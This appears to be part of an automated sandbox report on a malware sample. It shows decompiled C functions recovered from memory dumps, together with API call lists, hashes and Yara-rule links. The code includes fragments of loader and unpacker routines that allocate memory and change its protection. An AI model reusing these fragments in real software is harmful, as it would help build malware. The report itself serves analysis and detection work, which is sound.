0x100019f7
0x100019f7
0x10001a06
0x10001a0c

APIs

VirtualAlloc.KERNELBASE(00000000,1000167D,00003000,00000004,?,?,1000167D,00000000), ref: 1000194A
memcpy.NTDLL(?,?,1000167D,?,?,1000167D,00000000), ref: 100019DC
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,1000167D,00000000), ref: 100019F7

Strings

Mar 9 2021, xrefs: 1000197C

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 9 2021
API String ID: 4010158826-2159264323
Opcode ID: a02594a73b1b769850a39e6d0cf862abb4b58f68e535dbed4b7f3a649922de48
Instruction ID: d25fb31f2c2add74eafa799964551cc2416acfdb7abcc9e218ddf36d438f9e1f
Opcode Fuzzy Hash: a02594a73b1b769850a39e6d0cf862abb4b58f68e535dbed4b7f3a649922de48
Instruction Fuzzy Hash: 4D315271E0111A9FEB01CF99C891ADEBBF5EF48384F108169E904A7259D771AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000111A, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000111A(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E1000163F(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x10001123
0x10001128
0x10001136
0x1000113b
0x1000113b
0x10001141
0x10001146
0x1000114a
0x1000114e
0x1000114e
0x10001158
0x10001161

APIs

GetCurrentThread.KERNEL32 ref: 1000111D
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001128
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 1000113B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 1000114E

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: c35cabef654aae5fe09134992651e52fd0a70a53666a0e792eef5a60e0c71ab1
Instruction ID: 4c0cec3966cfd65f316416e497d44ff5eb1b0779e4299dd3e4543c5f6ab01fef
Opcode Fuzzy Hash: c35cabef654aae5fe09134992651e52fd0a70a53666a0e792eef5a60e0c71ab1
Instruction Fuzzy Hash: 91E092712066216BF302AB294C85EEB679DDF953F0B028225F620D22E8CF659D0286A5

Uniqueness

Uniqueness Score: -1.00%

Function 001C73FD, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C73FD(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E001CA72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x1cd27c; // 0x317a7d0
				_t4 = _t24 + 0x1cede0; // 0x33495b0
				_t5 = _t24 + 0x1ced88; // 0x4f0053
				_t26 = E001C1262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x1cd27c; // 0x317a7d0
						_t11 = _t32 + 0x1cedd4; // 0x33495a4
						_t48 = _t11;
						_t12 = _t32 + 0x1ced88; // 0x4f0053
						_t55 = E001C7CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x1cd27c; // 0x317a7d0
							_t13 = _t35 + 0x1cee1e; // 0x30314549
							if(E001C89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x1cd25c - 6;
								if( *0x1cd25c <= 6) {
									_t42 =  *0x1cd27c; // 0x317a7d0
									_t15 = _t42 + 0x1cec2a; // 0x52384549
									E001C89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x1cd27c; // 0x317a7d0
							_t17 = _t38 + 0x1cee18; // 0x33495e8
							_t18 = _t38 + 0x1cedf0; // 0x680043
							_t45 = E001C2659(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x1cd238, 0, _t55);
						}
					}
					HeapFree( *0x1cd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E001C1F99(_t54);
				}
				return _t45;
			}

0x001c73fd
0x001c740d
0x001c7410
0x001c7417
0x001c7419
0x001c7419
0x001c741c
0x001c7421
0x001c7428
0x001c7435
0x001c743a
0x001c743e
0x001c744c
0x001c745a
0x001c745e
0x001c74ef
0x001c74ef
0x001c7464
0x001c7464
0x001c7469
0x001c7469
0x001c7470
0x001c747c
0x001c747e
0x001c7480
0x001c7482
0x001c7489
0x001c749b
0x001c749d
0x001c74a4
0x001c74a6
0x001c74ad
0x001c74b8
0x001c74b8
0x001c74a4
0x001c74bd
0x001c74c2
0x001c74c9
0x001c74e7
0x001c74e9
0x001c74e9
0x001c7480
0x001c74fb
0x001c74fb
0x001c74fd
0x001c7502
0x001c7504
0x001c7504
0x001c750f

APIs

StrToIntExW.SHLWAPI(?,00000000,?), ref: 001C744C
HeapFree.KERNEL32(00000000,00000000,?), ref: 001C74E9
HeapFree.KERNEL32(00000000,?), ref: 001C74FB

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ac38ae95f86b6ae88be54c6d909d7ba72d99e270529d0b388fb8ec3123e092c5
Instruction ID: 234fd5dbcb016f112b1d3ba7cd81d74ca9691f5e4fcb0a6da96f58c54eabefb2
Opcode Fuzzy Hash: ac38ae95f86b6ae88be54c6d909d7ba72d99e270529d0b388fb8ec3123e092c5
Instruction Fuzzy Hash: 23317E71901108BFDB21DBA4EC85EAA7FECEB65704F2600A9B505A7161D7B0DE44DF60

Uniqueness

Uniqueness Score: -1.00%

Function 001C8504, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001C8504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x1cd340; // 0x3349b50
				_push(0x800);
				_push(0);
				_push( *0x1cd238);
				if( *0x1cd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x1cd24c =  *0x1cd24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E001C2496(_t44, _t40);
						_t18 = E001CA66E(_t37, _t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x1cd24c < 5) {
								 *0x1cd24c =  *0x1cd24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E001CA1B0();
						HeapFree( *0x1cd238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E001CA279(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E001C8B94(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x001c8504
0x001c8507
0x001c8508
0x001c8512
0x001c8519
0x001c851e
0x001c8520
0x001c8526
0x001c854e
0x001c8566
0x001c8568
0x001c8569
0x001c856b
0x001c85a9
0x001c85a9
0x001c85af
0x001c85b5
0x001c85b5
0x001c856d
0x001c8573
0x001c8576
0x001c8585
0x001c8587
0x001c858e
0x001c85c2
0x001c85c7
0x001c85c9
0x001c85cb
0x001c85cb
0x00000000
0x001c85c9
0x001c8590
0x001c8595
0x001c85a3
0x00000000
0x001c85a3
0x001c855d
0x001c8562
0x001c8562
0x00000000
0x001c8562
0x001c8530
0x00000000
0x00000000
0x001c853f
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,7671BB27), ref: 001C8528

Part of subcall function 001C8B94: GetTickCount.KERNEL32(7671BB27,03349B50,766F41C0,03349B50,00000002,001C685F,00000000), ref: 001C8BA8
Part of subcall function 001C8B94: wsprintfA.USER32 ref: 001C8BF8
Part of subcall function 001C8B94: wsprintfA.USER32 ref: 001C8C15
Part of subcall function 001C8B94: wsprintfA.USER32 ref: 001C8C41
Part of subcall function 001C8B94: HeapFree.KERNEL32(00000000,?), ref: 001C8C53
Part of subcall function 001C8B94: wsprintfA.USER32 ref: 001C8C74
Part of subcall function 001C8B94: HeapFree.KERNEL32(00000000,?), ref: 001C8C84
Part of subcall function 001C8B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001C8CB2
Part of subcall function 001C8B94: GetTickCount.KERNEL32 ref: 001C8CC3

RtlAllocateHeap.NTDLL(00000000,00000800,7671BB27), ref: 001C8546
HeapFree.KERNEL32(00000000,00000002,001C685F), ref: 001C85A3

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: ac6b351c976a51c3ad6185945f40aa96699479cd65d71c6397497141b20db5bf
Instruction ID: 323378f4b3ab4c8c306d05e14ef4b090d6c7a875cb8b5322a9e7152a797d63e0
Opcode Fuzzy Hash: ac6b351c976a51c3ad6185945f40aa96699479cd65d71c6397497141b20db5bf
Instruction Fuzzy Hash: D8213076200214EFDB119F55EC85FAA7BBCEB68754F10402AF901DB250DBB0ED859BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001179, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10001179(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x1000414c;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x10001183
0x10001190
0x10001196
0x100011a2
0x100011b2
0x100011b4
0x100011bc
0x10001251
0x10001258
0x00000000
0x00000000
0x00000000
0x100011c2
0x100011c2
0x100011c2
0x100011c6
0x00000000
0x00000000
0x100011d2
0x100011d6
0x100011fa
0x100011fe
0x10001212
0x10001212
0x10001218
0x10001227
0x1000122b
0x10001233
0x10001233
0x1000123b
0x1000123e
0x1000124b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000124b
0x10001206
0x1000120a
0x10001210
0x00000000
0x00000000
0x00000000
0x10001210
0x100011de
0x100011e2
0x100011ec
0x100011e4
0x100011e4
0x100011e4
0x00000000
0x100011e2
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 100011B2
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001227
GetLastError.KERNEL32 ref: 1000122D

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 4c066baaf28f8eb37efe3bcb5d7151aded5e51c0cb14aa7ceb28c1f7bbe160c8
Instruction ID: 0668daed04cbb7b664abe494ebfe9c2342c365f2a22d128ebf7293798eb97d5e
Opcode Fuzzy Hash: 4c066baaf28f8eb37efe3bcb5d7151aded5e51c0cb14aa7ceb28c1f7bbe160c8
Instruction Fuzzy Hash: A2217F31801206EFDB04DF95C885AEAF7F5FF44399F018859D50297458E3B8A6A5CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C3DD9, Relevance: 3.9, APIs: 3, Instructions: 155
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E001C3DD9(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x1cd27c; // 0x317a7d0
				_t5 = _t40 + 0x1cee40; // 0x410025
				_t85 = E001C6A12(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E001C9039(_v16);
					goto L24;
				}
				if(E001CA72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E001C809F(0,  *0x1cd33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x1cd27c; // 0x317a7d0
					_t11 = _t52 + 0x1ce81a; // 0x65696c43
					_t55 = E001C809F(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E001C6BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E001C9039(_t87);
					}
					if(_t80 != 0) {
						L17:
						E001C9039(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E001C1F99(_t86);
						}
						goto L22;
					} else {
						if(( *0x1cd260 & 0x00000001) == 0) {
							L14:
							E001C8F83(_t80, _v88, _v84,  *0x1cd270, 0);
							_t80 = E001C1C74(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E001C42EA( &_v40, 0);
							}
							E001C9039(_v88);
							goto L17;
						}
						_t67 =  *0x1cd27c; // 0x317a7d0
						_t18 = _t67 + 0x1ce823; // 0x65696c43
						_t70 = E001C809F(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E001C6BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E001C9039(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x001c3deb
0x001c3dee
0x001c3df5
0x001c3dfb
0x001c3dfc
0x001c3dfd
0x001c3dfe
0x001c3dff
0x001c3e00
0x001c3e08
0x001c3e14
0x001c3e18
0x001c3e1b
0x001c3f6b
0x001c3f6e
0x001c3f72
0x001c3f72
0x001c3e2d
0x001c3e35
0x001c3f5e
0x001c3f5f
0x001c3f62
0x00000000
0x001c3f62
0x001c3e47
0x001c3e49
0x001c3e49
0x001c3e54
0x001c3e5b
0x001c3e5e
0x001c3f4d
0x00000000
0x001c3e64
0x001c3e64
0x001c3e69
0x001c3e72
0x001c3e77
0x001c3e80
0x001c3ea3
0x001c3e82
0x001c3e98
0x001c3e9a
0x001c3e9a
0x001c3ea6
0x001c3f41
0x001c3f44
0x001c3f4e
0x001c3f4e
0x001c3f53
0x001c3f55
0x001c3f55
0x00000000
0x001c3eac
0x001c3eb3
0x001c3ef4
0x001c3f05
0x001c3f1b
0x001c3f1f
0x001c3f24
0x001c3f2a
0x001c3f37
0x001c3f37
0x001c3f3c
0x00000000
0x001c3f3c
0x001c3eb5
0x001c3eba
0x001c3ec3
0x001c3ec8
0x001c3ecc
0x001c3eef
0x001c3ece
0x001c3ee4
0x001c3ee6
0x001c3ee6
0x001c3ef2
0x00000000
0x00000000
0x00000000
0x00000000
0x001c3ef2
0x001c3ea6

APIs

memset.NTDLL ref: 001C3DEE

Part of subcall function 001C6A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,001C3E14,00410025,00000005,?,00000000), ref: 001C6A23
Part of subcall function 001C6A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 001C6A40

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 001C3E22
StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 001C3E2D

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: 43bd5dfff061dc9615f4372d33007fd82e13c30df43cfdbf4185758b6565bb7a
Instruction ID: 7c47fca944db9ce4f7890b4b2e5c0d6720e15380735ff545f57fc1e946cae736
Opcode Fuzzy Hash: 43bd5dfff061dc9615f4372d33007fd82e13c30df43cfdbf4185758b6565bb7a
Instruction Fuzzy Hash: C4416C72A00218AADB11AFE4DC85EEEBBBCAF28740F11842DF911E7111D771DE448B91

Uniqueness

Uniqueness Score: -1.00%

Function 002A6194, Relevance: 3.1, APIs: 2, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E002A6194(signed int __ebx, void* __ecx, signed int __edx, DWORD* __edi, long __esi, void* __eflags) {
				void* __ebp;
				void* _t44;
				long _t45;
				signed int _t49;
				int _t50;
				signed int _t51;
				void* _t55;
				long _t56;
				signed int _t59;
				signed int _t62;
				void* _t63;
				signed int _t64;
				signed int _t69;
				long _t72;
				signed int _t74;
				signed int _t76;
				DWORD* _t80;
				signed int _t83;
				void* _t84;
				signed int _t85;
				void* _t90;
				long _t94;
				void* _t97;
				void** _t99;
				void** _t100;

				_t92 = __esi;
				_t80 = __edi;
				_t69 = __edx;
				 *_t99 =  *_t99 + 0xffff0000;
				 *_t99 =  *_t99 - _t94;
				_t45 = E002A463F(_t44, __ebx, __ecx, __edi, __esi);
				_push(__ecx);
				_t62 = __ebx | __ebx;
				_t59 = _t62;
				_pop(_t63);
				if(_t62 != 0) {
					 *_t99 = 4;
					 *_t99 = 0x1000;
					_t94 =  *_t99;
					 *_t99 =  *(_t59 + 0x41823f);
					_t45 = VirtualAlloc(0, _t94, __esi, _t45);
				}
				 *_t99 =  *_t99 & 0x00000000;
				 *_t99 =  *_t99 | _t45;
				 *_t4 = _t94;
				 *(_t59 + 0x4184cf) = 2;
				 *(_t94 - 8) = _t69;
				 *(_t59 + 0x418379) =  *(_t59 + 0x418379) & 0x00000000;
				 *(_t59 + 0x418379) =  *(_t59 + 0x418379) | _t69 & 0x00000000 | _t45;
				_t72 =  *(_t94 - 8);
				if( *(_t59 + 0x4180f7) > 0) {
					_t56 = _t59 + 0x4184cf;
					 *_t99 =  *_t99 & 0x00000000;
					 *_t99 =  *_t99 | _t56;
					 *_t99 =  *_t99 + 0x40;
					 *_t99 =  *_t99 - _t56;
					_t72 =  *_t99;
					 *_t99 =  *(_t59 + 0x41856b);
					_t92 =  *_t99;
					 *_t99 =  *(_t59 + 0x4180f7);
					VirtualProtect( *_t99, _t72, _t56, _t80);
				}
				_push(_t80);
				 *_t99 =  *(_t59 + 0x418024);
				_push(_t72);
				_t99[1] =  *(_t59 + 0x418633);
				_t74 = _t72;
				 *(_t94 - 8) = E002A4859(_t59, _t63, _t74,  *_t99, _t92);
				_t64 = 0 ^  *(_t59 + 0x41856b);
				_t49 =  *(_t94 - 8);
				 *_t99 = _t94;
				_t83 = 0 ^  *(_t59 + 0x4180f7);
				_t97 = 0;
				 *_t99 =  *_t99 | _t83;
				_t84 = _t83;
				if( *_t99 != 0) {
					 *_t99 =  *_t99 & 0x00000000;
					 *_t99 =  *_t99 + _t84;
					_t49 = E002A2DF5(_t49, _t59, _t64, _t74, _t92, _t49);
				}
				 *_t99 =  *_t99 ^ _t49;
				_t50 = _t49;
				_t51 = memset(_t84, _t50, _t64 << 0);
				_t100 =  &(_t99[3]);
				_t85 = _t84 + _t64;
				if( *(_t59 + 0x418024) != _t59) {
					_t90 =  *_t100;
					 *_t100 =  *(_t59 + 0x418024);
					_t55 = E002A348F(_t59, 0, _t74, _t90, _t92, _t85); // executed
					_push(_t55);
					_t100[1] =  *(_t59 + 0x418024);
					_t85 = _t90;
					_t51 = E002A4DF5(_t55, _t59, _t74, _t85, _t92);
				}
				_push(_t85);
				_t76 = _t74 & 0x00000000 ^ _t85 & 0x00000000 ^  *(_t59 + 0x418418);
				_t100[5] = _t76;
				 *(_t97 - 4) = _t51;
				 *((intOrPtr*)(_t97 - 8)) = 0;
				 *(_t97 + 4) =  *(_t97 + 4) & 0x00000000;
				 *(_t97 + 4) =  *(_t97 + 4) | 0 | _t76 & 0x00000000 ^ (_t51 & 0x00000000 |  *(_t59 + 0x418418));
				asm("popad");
				return  *(_t97 - 4);
			}

0x002a6194
0x002a6194
0x002a6194
0x002a6195
0x002a619c
0x002a619f
0x002a61a4
0x002a61a7
0x002a61a9
0x002a61ab
0x002a61ac
0x002a61af
0x002a61b7
0x002a61c5
0x002a61c5
0x002a61ca
0x002a61ca
0x002a61d1
0x002a61d5
0x002a61d8
0x002a61de
0x002a61e8
0x002a61f0
0x002a61f7
0x002a61fd
0x002a6207
0x002a6209
0x002a6210
0x002a6214
0x002a6218
0x002a621c
0x002a6226
0x002a6226
0x002a6230
0x002a6230
0x002a6233
0x002a6233
0x002a6239
0x002a6240
0x002a6243
0x002a624b
0x002a624f
0x002a6255
0x002a6260
0x002a6262
0x002a6267
0x002a6272
0x002a6274
0x002a6276
0x002a6279
0x002a627a
0x002a627d
0x002a6281
0x002a6284
0x002a6284
0x002a628a
0x002a628d
0x002a628e
0x002a628e
0x002a628e
0x002a6296
0x002a629f
0x002a629f
0x002a62a2
0x002a62a7
0x002a62af
0x002a62b3
0x002a62b4
0x002a62b4
0x002a62b9
0x002a62c6
0x002a62c9
0x002a62cd
0x002a62e1
0x002a62e9
0x002a62ed
0x002a62f3
0x002a62f5

APIs

VirtualAlloc.KERNELBASE(00000000,?,?,00000000), ref: 002A61CA
VirtualProtect.KERNELBASE(?,?), ref: 002A6233

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 973912ba655f0d42c6a3ce3ffd5477ebdb1fbb1cfb58effa8c75d7567b35407f
Instruction ID: 3953343b8547261625ae9612adf387602de351df0b3df4c8a38cab6c2d3923d8
Opcode Fuzzy Hash: 973912ba655f0d42c6a3ce3ffd5477ebdb1fbb1cfb58effa8c75d7567b35407f
Instruction Fuzzy Hash: BA41D072504604DFEB00DF20C9857ADBBF9EFC8701F0A846DED888B24ADF7855508B69

Uniqueness

Uniqueness Score: -1.00%

Function 001C9152, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001C9152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t76 = E001C3AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x1cd27c; // 0x317a7d0
						_t20 = _t68 + 0x1ce1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E001C7C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x001c9158
0x001c915b
0x001c916b
0x001c9174
0x001c9178
0x001c9246
0x001c924c
0x001c924c
0x001c9197
0x001c919b
0x001c91a1
0x001c91a6
0x001c91ad
0x001c91bc
0x001c91bc
0x001c91c0
0x001c91c2
0x001c91ce
0x001c91d9
0x001c91e4
0x001c91e8
0x001c91f2
0x001c91f6
0x001c91f8
0x001c91fd
0x001c9204
0x001c9214
0x001c9214
0x001c91fd
0x001c91f6
0x001c9216
0x001c921b
0x001c9220
0x001c9220
0x001c9226
0x001c922c
0x001c9231
0x001c9231
0x001c9236
0x001c923b
0x001c923b
0x001c9236
0x001c91c0
0x001c923d
0x001c9243
0x00000000

APIs

Part of subcall function 001C3AEF: SysAllocString.OLEAUT32(80000002), ref: 001C3B46
Part of subcall function 001C3AEF: SysFreeString.OLEAUT32(00000000), ref: 001C3BAB

SysFreeString.OLEAUT32(?), ref: 001C9231
SysFreeString.OLEAUT32(001C1885), ref: 001C923B

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

